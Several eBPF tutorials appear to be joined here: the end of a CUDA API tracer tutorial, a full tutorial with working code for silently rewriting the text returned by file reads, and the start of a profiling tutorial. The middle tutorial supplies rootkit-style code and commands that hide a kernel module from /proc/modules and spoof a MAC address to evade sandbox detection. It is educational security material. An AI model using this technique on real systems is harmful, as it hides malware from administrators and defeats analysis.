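This function formats and displays event information, including timestamps, process details, event type, and specific parameters or return values. Note that the timestamp is taken in user space when the event is processed, so it can lag slightly behind the moment the CUDA call actually happened.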

The get_event_details function converts raw event data into human-readable form:

static void get_event_details(const struct event *e, char *details, size_t len) {
    switch (e->type) {
    case CUDA_EVENT_MALLOC:
        if (!e->is_return)
            snprintf(details, len, "size=%zu bytes", e->mem.size);
        else
            snprintf(details, len, "returned=%s", cuda_error_str(e->ret_val));
        break;

    /* Similar cases for other event types... */
    }
}

This function handles each event type differently. For example, a malloc event shows the requested size on entry and the error code on exit.

The main event loop is remarkably simple:

while (!exiting) {
    err = ring_buffer__poll(rb, 100 /* timeout, ms */);
    /* Error handling... */
}

This polls the ring buffer for events, calling handle_event for each one. The 100ms timeout ensures the program remains responsive to signals like Ctrl+C.
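The exiting flag in that loop is normally set from a signal handler. The following sketch shows one common way to wire it up. It is an assumption for illustration rather than the tutorial's exact code: install_exit_handlers, run_until_exit and demo_poll are hypothetical names, and demo_poll merely stands in for ring_buffer__poll(rb, 100) so the example runs without libbpf.

```c
#include <assert.h>
#include <errno.h>
#include <signal.h>
#include <stddef.h>

/* Written from the signal handler, read by the main loop. */
static volatile sig_atomic_t exiting;

static void sig_handler(int sig)
{
    (void)sig;
    exiting = 1;  /* only set a flag; the loop does the actual shutdown */
}

/* Install the handler for Ctrl+C (SIGINT) and SIGTERM. Returns 0 on success. */
static int install_exit_handlers(void)
{
    if (signal(SIGINT, sig_handler) == SIG_ERR)
        return -1;
    if (signal(SIGTERM, sig_handler) == SIG_ERR)
        return -1;
    return 0;
}

/* Poll until the flag is set or polling fails; returns the iteration count.
 * poll_once plays the role of ring_buffer__poll(rb, 100). */
static int run_until_exit(int (*poll_once)(void))
{
    int iterations = 0;

    assert(poll_once != NULL);
    while (!exiting) {
        int err = poll_once();

        iterations++;
        if (err == -EINTR)  /* interrupted by a signal: re-check the flag */
            continue;
        if (err < 0)        /* any other negative value is treated as fatal */
            break;
    }
    return iterations;
}

/* Demo stand-in for the poll call: "times out" twice, then simulates
 * the user pressing Ctrl+C by raising SIGINT. */
static int demo_poll(void)
{
    static int calls;

    if (++calls == 3)
        raise(SIGINT);
    return 0;
}
```

Because the real poll call returns after at most 100 ms, the loop notices the flag shortly after the signal arrives even when no events are flowing.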

CUDA Error Handling and Reporting

An important aspect of our tracer is translating CUDA error codes into human-readable messages. CUDA has over 100 different error codes, from simple ones like "out of memory" to complex ones like "unsupported PTX version."

Our tool includes a comprehensive cuda_error_str function that maps these numeric codes to string descriptions:

static const char *cuda_error_str(int error) {
    switch (error) {
    case 0:  return "Success";
    case 1:  return "InvalidValue";
    case 2:  return "OutOfMemory";
    /* Many more error codes... */
    default: return "Unknown";
    }
}

This makes the output much more useful for debugging. Instead of seeing "error 2", you'll see "OutOfMemory", which immediately tells you what went wrong.

Compilation and Execution

Building the tracer is straightforward with the provided Makefile:

# Build both the tracer and the example
make

This creates two binaries:

cuda_events: The eBPF-based CUDA tracing tool
basic02: A simple CUDA example application

The build system is smart enough to detect your GPU architecture using nvidia-smi and compile the CUDA code with the appropriate flags.

Running the tracer is just as easy:

# Start the tracing tool
sudo ./cuda_events -p ./basic02

# In another terminal, run the CUDA example
./basic02

You can also trace a specific process by PID:

# Run the CUDA example
./basic02 &
PID=$!

# Start the tracing tool with PID filtering
sudo ./cuda_events -p ./basic02 -d $PID

The example output shows detailed information about each CUDA operation:

Using CUDA library: ./basic02
TIME     PROCESS          PID     EVENT                 TYPE    DETAILS
17:35:41 basic02          12345   cudaMalloc          [ENTER]  size=4000 bytes
17:35:41 basic02          12345   cudaMalloc           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMalloc          [ENTER]  size=4000 bytes
17:35:41 basic02          12345   cudaMalloc           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMemcpy          [ENTER]  size=4000 bytes, kind=1
17:35:41 basic02          12345   cudaMemcpy           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaLaunchKernel    [ENTER]  func=0x7f1234567890
17:35:41 basic02          12345   cudaLaunchKernel     [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMemcpy          [ENTER]  size=4000 bytes, kind=2
17:35:41 basic02          12345   cudaMemcpy           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaFree            [ENTER]  ptr=0x7f1234568000
17:35:41 basic02          12345   cudaFree             [EXIT]  returned=Success
17:35:41 basic02          12345   cudaFree            [ENTER]  ptr=0x7f1234569000
17:35:41 basic02          12345   cudaFree             [EXIT]  returned=Success

This output shows the typical flow of a CUDA application:

Allocate memory on the device
Copy data from host to device (kind=1)
Launch a kernel to process the data
Copy results back from device to host (kind=2)
Free device memory

Benchmark

We also provide a benchmark tool to test the performance of the tracer and the latency of the CUDA API calls.

make
sudo ./cuda_events -p ./bench
./bench

Without tracing, the results look like this:

Data size: 1048576 bytes (1024 KB)
Iterations: 10000

Summary (average time per operation):
-----------------------------------
cudaMalloc:           113.14 µs
cudaMemcpyH2D:        365.85 µs
cudaLaunchKernel:       7.82 µs
cudaMemcpyD2H:        393.55 µs
cudaFree:               0.00 µs

With the tracer attached, the results look like this:

Data size: 1048576 bytes (1024 KB)
Iterations: 10000

Summary (average time per operation):
-----------------------------------
cudaMalloc:           119.81 µs
cudaMemcpyH2D:        367.16 µs
cudaLaunchKernel:       8.77 µs
cudaMemcpyD2H:        383.66 µs
cudaFree:               0.00 µs

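In this run the tracer adds roughly 1 to 7 µs to each traced CUDA API call, which is negligible for most cases. (cudaMemcpyD2H actually came out faster with the tracer attached, so part of the difference is measurement noise.) To further reduce the overhead, you can try using the bpftime userspace runtime to optimize the eBPF program.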
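The per-operation difference can be read straight off the two summaries above. The short sketch below does the subtraction; the numbers are copied from the benchmark output, while the names bench_row, overhead_us, overhead_pct and print_overhead are hypothetical. cudaFree is left out because both runs report 0.00 µs for it.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

struct bench_row {
    const char *op;
    double base_us;    /* average without tracing */
    double traced_us;  /* average with the tracer attached */
};

/* Figures copied from the two benchmark summaries. */
static const struct bench_row bench_rows[] = {
    { "cudaMalloc",       113.14, 119.81 },
    { "cudaMemcpyH2D",    365.85, 367.16 },
    { "cudaLaunchKernel",   7.82,   8.77 },
    { "cudaMemcpyD2H",    393.55, 383.66 },
};

#define BENCH_ROWS (sizeof(bench_rows) / sizeof(bench_rows[0]))

/* Absolute difference in microseconds (negative means the traced run was faster). */
static double overhead_us(const struct bench_row *r)
{
    return r->traced_us - r->base_us;
}

/* Difference relative to the untraced average, in percent. */
static double overhead_pct(const struct bench_row *r)
{
    assert(r->base_us > 0.0);
    return 100.0 * overhead_us(r) / r->base_us;
}

/* Print one line per operation, e.g. to stdout. */
static void print_overhead(FILE *out)
{
    for (size_t i = 0; i < BENCH_ROWS; i++)
        fprintf(out, "%-18s %+7.2f us (%+6.2f%%)\n", bench_rows[i].op,
                overhead_us(&bench_rows[i]), overhead_pct(&bench_rows[i]));
}
```

With these figures the difference is about +6.67 µs for cudaMalloc, +1.31 µs for cudaMemcpyH2D, +0.95 µs for cudaLaunchKernel, and -9.89 µs for cudaMemcpyD2H. The negative value is a reminder that run-to-run variation is of the same order as the overhead being measured, so repeated runs are needed for a firm number.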

Command Line Options

The cuda_events tool supports these options:

-v: Enable verbose output for debugging
-t: Don't print timestamps
-r: Don't show function returns (only show function entries)
-p PATH: Specify the path to the CUDA runtime library or application
-d PID: Trace only the specified process ID
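As a minimal sketch of how these flags could map onto the configuration structure shown earlier, the example below uses POSIX getopt. This is an assumption for illustration: the tutorial's actual parser may be written differently (for example with argp), and the names tracer_opts and parse_tracer_opts are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>
#include <unistd.h>

/* Mirrors the fields of the tutorial's env structure. */
struct tracer_opts {
    bool verbose;
    bool print_timestamp;
    bool include_returns;
    const char *cuda_library_path;
    int target_pid;
};

/* Parse -v, -t, -r, -p PATH and -d PID. Returns 0 on success, -1 on a bad flag. */
static int parse_tracer_opts(int argc, char **argv, struct tracer_opts *o)
{
    int c;

    assert(o != NULL);

    /* Same defaults as the env initializer: timestamps and returns on, no PID filter. */
    *o = (struct tracer_opts){
        .print_timestamp = true,
        .include_returns = true,
        .cuda_library_path = NULL,
        .target_pid = -1,
    };

    optind = 1;  /* start scanning at the first argument */
    while ((c = getopt(argc, argv, "vtrp:d:")) != -1) {
        switch (c) {
        case 'v': o->verbose = true; break;
        case 't': o->print_timestamp = false; break;  /* -t disables timestamps */
        case 'r': o->include_returns = false; break;  /* -r hides return probes */
        case 'p': o->cuda_library_path = optarg; break;
        case 'd': o->target_pid = atoi(optarg); break;
        default:  return -1;
        }
    }
    return 0;
}
```

Note that -t and -r are "off switches": both behaviours are enabled by default, matching the initial values of env.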

Next Steps

Once you're comfortable with this basic CUDA tracing tool, you could extend it to:

Add support for more CUDA API functions
Add timing information to analyze performance bottlenecks
Implement correlation between related operations (e.g., matching mallocs with frees)
Create visualizations of CUDA operations for easier analysis
Add support for other GPU frameworks like OpenCL or ROCm

For more detail about the CUDA example and tutorial, you can check out our repo and the code at https://github.com/eunomia-bpf/basic-cuda-tutorial

The code of this tutorial is in https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events

References

CUDA Programming Guide: https://docs.nvidia.com/cuda/cuda-c-programming-guide/
NVIDIA CUDA Runtime API: https://docs.nvidia.com/cuda/cuda-runtime-api/
libbpf Documentation: https://libbpf.readthedocs.io/
Linux uprobes Documentation: https://www.kernel.org/doc/Documentation/trace/uprobetracer.txt
eGPU: eBPF on GPUs: https://dl.acm.org/doi/10.1145/3723851.3726984
bpftime GPU Examples: https://github.com/eunomia-bpf/bpftime/tree/master/example/gpu

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

eBPF Tutorial: Transparent Text Replacement in File Reads

云微 — Tue, 23 Dec 2025 07:17:34 +0000

When you read a file in Linux, you trust that what you see matches what's stored on disk. But what if the kernel itself was lying to you? This tutorial demonstrates how eBPF programs can intercept file read operations and silently replace text before applications ever see it—creating a powerful capability for both defensive security monitoring and offensive rootkit techniques.

Unlike traditional file modification that leaves traces in timestamps and audit logs, this approach manipulates data in-flight during the read system call. The file on disk remains untouched, yet every program reading it sees modified content. This technique has legitimate uses in security research, honeypot deployment, and anti-malware deception, but also reveals how rootkits can hide their presence from system administrators.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/27-replace

Use Cases: From Security to Deception

Text replacement in file reads serves several purposes across the security spectrum. For defenders, it enables honeypot systems that present fake credentials to attackers, or deception layers that make malware believe it's succeeded when it hasn't. Security researchers use it to study malware behavior by feeding controlled data to suspicious processes.

On the offensive side, rootkits use this exact technique to hide their presence. The classic example is hiding kernel modules from lsmod by replacing their names in /proc/modules with whitespace or other module names. Malware can spoof MAC addresses by modifying reads from /sys/class/net/*/address, defeating sandbox detection that looks for virtual machine identifiers.

The key insight is that this operates at the system call boundary—after the kernel reads the file but before the userspace process sees the data. No matter how many times you cat the file or open it in different editors, you'll always see the modified version, because the eBPF program intercepts every read operation.

Architecture: Multi-Stage Text Scanning and Replacement

This implementation is more sophisticated than simple string replacement. The challenge is working within eBPF's constraints: limited stack size, no unbounded loops, and strict verifier checks. To handle arbitrarily large files and multiple matches, the program uses a three-stage approach with tail calls to chain eBPF programs together.

The first stage (find_possible_addrs) scans through the read buffer looking for characters that match the first character of our search string. It can't do full string matching yet due to complexity limits, so it just marks potential locations. These addresses are stored in map_name_addrs for the next stage.

The second stage (check_possible_addresses) is tail-called from the first. It examines each potential match location and performs full string comparison using bpf_strncmp. This verifies whether we actually found our target text. Confirmed matches go into map_to_replace_addrs.

The third stage (overwrite_addresses) loops through confirmed match locations and uses bpf_probe_write_user to overwrite the text with the replacement string. Because both strings must be the same length (to avoid shifting memory and corrupting the buffer), users must pad their replacement text to match.

This pipeline handles the verifier's complexity limits by splitting the work across multiple programs, each staying under the instruction count threshold. Tail calls provide the glue, allowing one program to pass control to the next with the same context.
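The three stages are easier to follow when written as ordinary userspace C over a plain buffer. The sketch below is not the eBPF code: it uses memcmp and memcpy where the real programs use BPF helpers, keeps its candidate lists in local arrays instead of BPF maps, and chains the stages with normal function calls instead of tail calls. All function names are hypothetical; MAX_CANDIDATES mirrors the MAX_POSSIBLE_ADDRS limit used in the eBPF code.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define MAX_CANDIDATES 500

/* Stage 1: record every offset whose byte equals the first byte of the needle. */
static size_t find_candidates(const char *buf, size_t len, char first,
                              size_t *out, size_t max_out)
{
    size_t n = 0;

    for (size_t i = 0; i < len && n < max_out; i++)
        if (buf[i] == first)
            out[n++] = i;
    return n;
}

/* Stage 2: keep only the candidates where the whole needle matches. */
static size_t confirm_candidates(const char *buf, size_t len,
                                 const char *find, size_t find_len,
                                 const size_t *cand, size_t n_cand, size_t *out)
{
    size_t n = 0;

    for (size_t i = 0; i < n_cand; i++)
        if (cand[i] + find_len <= len &&
            memcmp(buf + cand[i], find, find_len) == 0)
            out[n++] = cand[i];
    return n;
}

/* Stage 3: overwrite each confirmed match in place. */
static void overwrite_matches(char *buf, const char *repl, size_t repl_len,
                              const size_t *hits, size_t n_hits)
{
    for (size_t i = 0; i < n_hits; i++)
        memcpy(buf + hits[i], repl, repl_len);
}

/* Run all three stages. Returns the number of replacements,
 * or -1 if the strings are empty or differ in length. */
static int replace_same_length(char *buf, size_t len,
                               const char *find, const char *repl)
{
    size_t cand[MAX_CANDIDATES], hits[MAX_CANDIDATES];
    size_t find_len, n;

    assert(buf != NULL && find != NULL && repl != NULL);
    find_len = strlen(find);
    if (find_len == 0 || strlen(repl) != find_len)
        return -1;  /* equal length keeps the buffer size unchanged */

    n = find_candidates(buf, len, find[0], cand, MAX_CANDIDATES);
    n = confirm_candidates(buf, len, find, find_len, cand, n, hits);
    overwrite_matches(buf, repl, find_len, hits, n);
    return (int)n;
}
```

Splitting the cheap first-byte scan from the full comparison is what lets each eBPF stage stay small. The length check in replace_same_length corresponds to the requirement that the replacement text be padded to the length of the search text.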

Implementation Details

Let's examine the complete eBPF code that implements this three-stage pipeline:

// SPDX-License-Identifier: BSD-3-Clause
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>
#include <bpf/bpf_core_read.h>
#include "replace.h"

char LICENSE[] SEC("license") = "Dual BSD/GPL";

// Ringbuffer Map to pass messages from kernel to user
struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 256 * 1024);
} rb SEC(".maps");

// Map to hold the File Descriptors from 'openat' calls
struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 8192);
    __type(key, size_t);
    __type(value, unsigned int);
} map_fds SEC(".maps");

// Map to hold the buffer addresses from 'read' calls
struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 8192);
    __type(key, size_t);
    __type(value, long unsigned int);
} map_buff_addrs SEC(".maps");

// Maps to hold candidate and confirmed match addresses in the read buffer
// NOTE: This should probably be a map-of-maps, with the top-level
// key being pid_tgid, so we know we're looking at the right program
#define MAX_POSSIBLE_ADDRS 500
struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, MAX_POSSIBLE_ADDRS);
    __type(key, unsigned int);
    __type(value, long unsigned int);
} map_name_addrs SEC(".maps");
struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, MAX_POSSIBLE_ADDRS);
    __type(key, unsigned int);
    __type(value, long unsigned int);
} map_to_replace_addrs SEC(".maps");

// Map holding the programs for tail calls
struct {
    __uint(type, BPF_MAP_TYPE_PROG_ARRAY);
    __uint(max_entries, 5);
    __type(key, __u32);
    __type(value, __u32);
} map_prog_array SEC(".maps");

// Optional Target Parent PID
const volatile int target_ppid = 0;

// These store the name of the file to replace text in
const volatile int filename_len = 0;
const volatile char filename[50];

// These store the text to find and replace in the file
const volatile  unsigned int text_len = 0;
const volatile char text_find[FILENAME_LEN_MAX];
const volatile char text_replace[FILENAME_LEN_MAX];

SEC("tp/syscalls/sys_exit_close")
int handle_close_exit(struct trace_event_raw_sys_exit *ctx)
{
    // Check if we're a process thread of interest
    size_t pid_tgid = bpf_get_current_pid_tgid();
    int pid = pid_tgid >> 32;
    unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid);
    if (check == 0) {
        return 0;
    }

    // Closing file, delete fd from all maps to clean up
    bpf_map_delete_elem(&map_fds, &pid_tgid);
    bpf_map_delete_elem(&map_buff_addrs, &pid_tgid);

    return 0;
}

SEC("tp/syscalls/sys_enter_openat")
int handle_openat_enter(struct trace_event_raw_sys_enter *ctx)
{
    size_t pid_tgid = bpf_get_current_pid_tgid();
    int pid = pid_tgid >> 32;
    // Check if we're a process thread of interest
    // if target_ppid is 0 then we target all pids
    if (target_ppid != 0) {
        struct task_struct *task = (struct task_struct *)bpf_get_current_task();
        int ppid = BPF_CORE_READ(task, real_parent, tgid);
        if (ppid != target_ppid) {
            return 0;
        }
    }

    // Get filename from arguments
    char check_filename[FILENAME_LEN_MAX];
    bpf_probe_read_user(&check_filename, filename_len, (char*)ctx->args[1]);

    // Check filename is our target
    for (int i = 0; i < filename_len; i++) {
        if (filename[i] != check_filename[i]) {
            return 0;
        }
    }

    // Add pid_tgid to map for our sys_exit call
    unsigned int zero = 0;
    bpf_map_update_elem(&map_fds, &pid_tgid, &zero, BPF_ANY);

    bpf_printk("[TEXT_REPLACE] PID %d Filename %s\n", pid, filename);
    return 0;
}

SEC("tp/syscalls/sys_exit_openat")
int handle_openat_exit(struct trace_event_raw_sys_exit *ctx)
{
    // Check this open call is opening our target file
    size_t pid_tgid = bpf_get_current_pid_tgid();
    unsigned int* check = bpf_map_lookup_elem(&map_fds, &pid_tgid);
    if (check == 0) {
        return 0;
    }
    int pid = pid_tgid >> 32;

    // Set the map value to be the returned file descriptor
    unsigned int fd = (unsigned int)ctx->ret;
    bpf_map_update_elem(&map_fds, &pid_tgid, &fd, BPF_ANY);

    return 0;
}

SEC("tp/syscalls/sys_enter_read")
int handle_read_enter(struct trace_event_raw_sys_enter *ctx)
{
    // Check this thread has opened our target file
    size_t pid_tgid = bpf_get_current_pid_tgid();
    int pid = pid_tgid >> 32;
    unsigned int* pfd = bpf_map_lookup_elem(&map_fds, &pid_tgid);
    if (pfd == 0) {
        return 0;
    }

    // Check this is the correct file descriptor
    unsigned int map_fd = *pfd;
    unsigned int fd = (unsigned int)ctx->args[0];
    if (map_fd != fd) {
        return 0;
    }

    // Store buffer address from arguments in map
    long unsigned int buff_addr = ctx->args[1];
    bpf_map_update_elem(&map_buff_addrs, &pid_tgid, &buff_addr, BPF_ANY);

    // log and exit
    size_t buff_size = (size_t)ctx->args[2];
    bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_addr 0x%lx\n", pid, fd, buff_addr);
    bpf_printk("[TEXT_REPLACE] PID %d | fd %d | buff_size %lu\n", pid, fd, buff_size);
    return 0;
}

SEC("tp/syscalls/sys_exit_read")
int find_possible_addrs(struct trace_event_raw_sys_exit *ctx)
{
    // Check this read call is reading our target file
    size_t pid_tgid = bpf_get_current_pid_tgid();
    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
    if (pbuff_addr == 0) {
        return 0;
    }
    int pid = pid_tgid >> 32;
    long unsigned int buff_addr = *pbuff_addr;
    long unsigned int name_addr = 0;
    if (buff_addr <= 0) {
        return 0;
    }

    // This is amount of data returned from the read syscall
    if (ctx->ret <= 0) {
        return 0;
    }
    long int buff_size = ctx->ret;
    unsigned long int read_size = buff_size;

    bpf_printk("[TEXT_REPLACE] PID %d | read_size %lu | buff_addr 0x%lx\n", pid, read_size, buff_addr);
    // 64 may be too large for the loop
    char local_buff[LOCAL_BUFF_SIZE] = { 0x00 };

    if (read_size > (LOCAL_BUFF_SIZE+1)) {
        // Need to loop :-(
        read_size = LOCAL_BUFF_SIZE;
    }

    // Read the data returned in chunks, and note every instance
    // of the first character of our 'to find' text.
    // This is all very convoluted, but is required to keep
    // the program complexity and size low enough to pass the verifier checks
    unsigned int tofind_counter = 0;
    for (unsigned int i = 0; i < loop_size; i++) {
        // Read in chunks from buffer
        bpf_probe_read(&local_buff, read_size, (void*)buff_addr);
        for (unsigned int j = 0; j < LOCAL_BUFF_SIZE; j++) {
            // Look for the first char of our 'to find' text
            if (local_buff[j] == text_find[0]) {
                name_addr = buff_addr+j;
                // This is possibly our text, add the address to the map to be
                // checked by program 'check_possible_addrs'
                bpf_map_update_elem(&map_name_addrs, &tofind_counter, &name_addr, BPF_ANY);
                tofind_counter++;
            }
        }

        buff_addr += LOCAL_BUFF_SIZE;
    }

    // Tail-call into 'check_possible_addrs' to loop over possible addresses
    bpf_printk("[TEXT_REPLACE] PID %d | tofind_counter %d \n", pid, tofind_counter);

    bpf_tail_call(ctx, &map_prog_array, PROG_01);
    return 0;
}

SEC("tp/syscalls/sys_exit_read")
int check_possible_addresses(struct trace_event_raw_sys_exit *ctx) {
    // Check whether we recorded a read buffer for this thread
    size_t pid_tgid = bpf_get_current_pid_tgid();
    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
    if (pbuff_addr == 0) {
        return 0;
    }
    int pid = pid_tgid >> 32;
    long unsigned int* pName_addr = 0;
    long unsigned int name_addr = 0;
    unsigned int newline_counter = 0;
    unsigned int match_counter = 0;

    char name[text_len_max+1];
    unsigned int j = 0;
    char old = 0;
    const unsigned int name_len = text_len;
    if (name_len < 0) {
        return 0;
    }
    if (name_len > text_len_max) {
        return 0;
    }
    // Go over every possible location
    // and check if it really does match our text
    for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) {
        newline_counter = i;
        pName_addr = bpf_map_lookup_elem(&map_name_addrs, &newline_counter);
        if (pName_addr == 0) {
            break;
        }
        name_addr = *pName_addr;
        if (name_addr == 0) {
            break;
        }
        bpf_probe_read_user(&name, text_len_max, (char*)name_addr);
        // for (j = 0; j < text_len_max; j++) {
        //     if (name[j] != text_find[j]) {
        //         break;
        //     }
        // }
        // We can use bpf_strncmp here,
        // but it is not available on kernels older than 5.17
        if (bpf_strncmp(name, text_len_max, (const char *)text_find) == 0) {
            // ***********
            // We've found our text!
            // Add location to map to be overwritten
            // ***********
            bpf_map_update_elem(&map_to_replace_addrs, &match_counter, &name_addr, BPF_ANY);
            match_counter++;
        }
        bpf_map_delete_elem(&map_name_addrs, &newline_counter);
    }

    // If we found at least one match, jump into program to overwrite text
    if (match_counter > 0) {
        bpf_tail_call(ctx, &map_prog_array, PROG_02);
    }
    return 0;
}

SEC("tp/syscalls/sys_exit_read")
int overwrite_addresses(struct trace_event_raw_sys_exit *ctx) {
    // Check whether we recorded a read buffer for this thread
    size_t pid_tgid = bpf_get_current_pid_tgid();
    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buff_addrs, &pid_tgid);
    if (pbuff_addr == 0) {
        return 0;
    }
    int pid = pid_tgid >> 32;
    long unsigned int* pName_addr = 0;
    long unsigned int name_addr = 0;
    unsigned int match_counter = 0;

    // Loop over every address to replace text into
    for (unsigned int i = 0; i < MAX_POSSIBLE_ADDRS; i++) {
        match_counter = i;
        pName_addr = bpf_map_lookup_elem(&map_to_replace_addrs, &match_counter);
        if (pName_addr == 0) {
            break;
        }
        name_addr = *pName_addr;
        if (name_addr == 0) {
            break;
        }

        // Attempt to overwrite data with our replacement string (minus the end null bytes)
        long ret = bpf_probe_write_user((void*)name_addr, (void*)text_replace, text_len);
        // Send event
        struct event *e;
        e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
        if (e) {
            e->success = (ret == 0);
            e->pid = pid;
            bpf_get_current_comm(&e->comm, sizeof(e->comm));
            bpf_ringbuf_submit(e, 0);
        }
        bpf_printk("[TEXT_REPLACE] PID %d | [*] replaced: %s\n", pid, text_find);

        // Clean up map now we're done
        bpf_map_delete_elem(&map_to_replace_addrs, &match_counter);
    }

    return 0;
}

The program starts with the familiar pattern of tracking file opens. When a process opens our target file (specified via the filename constant), we record its file descriptor in map_fds. This lets us identify reads from that specific file later.

The interesting part begins in handle_read_enter, where we capture the buffer address that userspace passed to the read() system call. This address is where the kernel will write the file contents, and crucially, it's also where we can modify them before the userspace process looks at the data.

The main logic lives in find_possible_addrs, attached to sys_exit_read. After the kernel completes the read operation, we scan through the buffer looking for potential matches. The constraint here is that we can't do unbounded loops—the verifier would reject that. So we read in chunks of LOCAL_BUFF_SIZE bytes and scan for the first character of our search string. Each potential match address goes into map_name_addrs.

Once we've scanned the buffer, we use a tail call to jump into check_possible_addresses. This program iterates through the potential matches and performs full string comparison using bpf_strncmp (available in kernel 5.17+). Confirmed matches move to map_to_replace_addrs. If we found any matches, we tail-call once more into overwrite_addresses.

The final stage, overwrite_addresses, performs the actual modification using bpf_probe_write_user. It loops through confirmed match locations and overwrites each one with the replacement text. The requirement that both strings have the same length prevents buffer corruption—we're doing in-place replacement without shifting any memory.
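The three stages can be mimicked in ordinary userspace C to see why the equal-length rule matters. This is only an illustrative sketch, not the eBPF code: replace_in_place is a hypothetical helper, and plain memcmp and memcpy stand in for bpf_strncmp and bpf_probe_write_user.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical userspace analogue of the three stages.
 * Returns the number of replacements made in buf[0..buf_len). */
static size_t replace_in_place(char *buf, size_t buf_len,
                               const char *find, const char *repl)
{
    size_t len = strlen(find);
    size_t replaced = 0;

    /* Same-length rule: an in-place overwrite must not shift any bytes. */
    assert(len > 0 && len == strlen(repl));

    for (size_t i = 0; i + len <= buf_len; i++) {
        /* Stage 1: cheap filter on the first character only. */
        if (buf[i] != find[0])
            continue;
        /* Stage 2: full comparison of the candidate location. */
        if (memcmp(buf + i, find, len) != 0)
            continue;
        /* Stage 3: overwrite the match, leaving out the trailing NUL. */
        memcpy(buf + i, repl, len);
        replaced++;
        i += len - 1; /* skip past the bytes just written */
    }
    return replaced;
}
```

Because the replacement has exactly the same length as the match, everything after it in the buffer stays where the reader expects it.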

Tail Calls and Verifier Constraints

The use of tail calls (bpf_tail_call) is critical here. eBPF programs face strict complexity limits—the verifier analyzes every possible execution path to ensure the program terminates and doesn't access invalid memory. A single program that does scanning, matching, and replacement would exceed these limits.

Tail calls let us chain programs so that the verifier checks each one separately instead of analyzing one large program. When find_possible_addrs calls bpf_tail_call(ctx, &map_prog_array, PROG_01), it jumps to a different program (check_possible_addresses) with the same context. On success the call never returns: the current program's execution ends and the new program, which was verified against its own complexity budget, takes over. If the slot in map_prog_array is empty, the call fails and execution falls through to the return 0 that follows it.

The userspace loader must populate map_prog_array with file descriptors for the tail-called programs before attaching anything. This is done in the userspace code using bpf_map_update_elem, mapping index PROG_01 to the check_possible_addresses program and PROG_02 to overwrite_addresses.

This architecture demonstrates a key eBPF development pattern: when you hit verifier limits, split your logic into multiple programs and use tail calls to coordinate them.

Practical Examples and Security Implications

Let's look at real-world use cases. Hiding kernel modules from detection:

./replace -f /proc/modules -i 'joydev' -r 'cryptd'

When any process reads /proc/modules, they'll see cryptd where joydev actually appears. The module is still loaded and functioning, but tools like lsmod can't see it. This is a classic rootkit technique.

Spoofing MAC addresses to defeat anti-sandbox checks:

./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00'

Malware often checks for virtualization by looking at MAC address prefixes (00:15:5d indicates Hyper-V). Replacing the real MAC address with zeros makes that check fail, so the sample behaves as if it were running on physical hardware, which makes sandbox analysis easier.

The defensive flip side is using this for honeypot systems. You can present fake credentials in configuration files, or make malware believe it successfully compromised a system when it hasn't. The file content on disk remains unchanged, but attackers reading it see false information.

Compilation and Execution

Compile the program:

cd src/27-replace
make

Run with specified file and text replacement:

sudo ./replace --filename /path/to/file --input foo --replace bar

Both input and replace must be the same length to avoid buffer corruption. To include newlines in bash, use $'\n':

./replace -f /proc/modules -i 'joydev' -r $'aaaaa\n'

The program intercepts all reads of the specified file and replaces matching text transparently. Press Ctrl-C to stop.

Summary

This tutorial demonstrated how eBPF programs can intercept file read operations and modify data before userspace sees it, without altering the actual file. We explored the three-stage architecture using tail calls to work within verifier constraints, the use of bpf_probe_write_user for memory manipulation, and practical applications ranging from rootkit techniques to defensive honeypot deployment. Understanding these patterns is crucial for both offensive security research and building detection mechanisms that account for eBPF-based attacks.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Original bad-bpf project: https://github.com/pathtofile/bad-bpf
eBPF tail calls documentation: https://docs.kernel.org/bpf/prog_sk_lookup.html
BPF verifier and program complexity: https://www.kernel.org/doc/html/latest/bpf/verifier.html

eBPF Tutorial by Example 32: Wall Clock Profiling with Combined On-CPU and Off-CPU Analysis

云微 — Tue, 16 Dec 2025 07:16:59 +0000

Performance bottlenecks can hide in two very different places. Your code might be burning CPU cycles in hot loops, or it might be sitting idle waiting for I/O, network responses, or lock contention. Traditional profilers often focus on just one side of this story. But what if you could see both at once?

This tutorial introduces a complete wall clock profiling solution that combines on-CPU and off-CPU analysis using eBPF. We'll show you how to capture the full picture of where your application spends its time, using two complementary eBPF programs that work together to account for every microsecond of execution. Whether your performance problems come from computation or waiting, you'll be able to spot them in a unified flame graph view.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/32-wallclock-profiler

Understanding Wall Clock Profiling

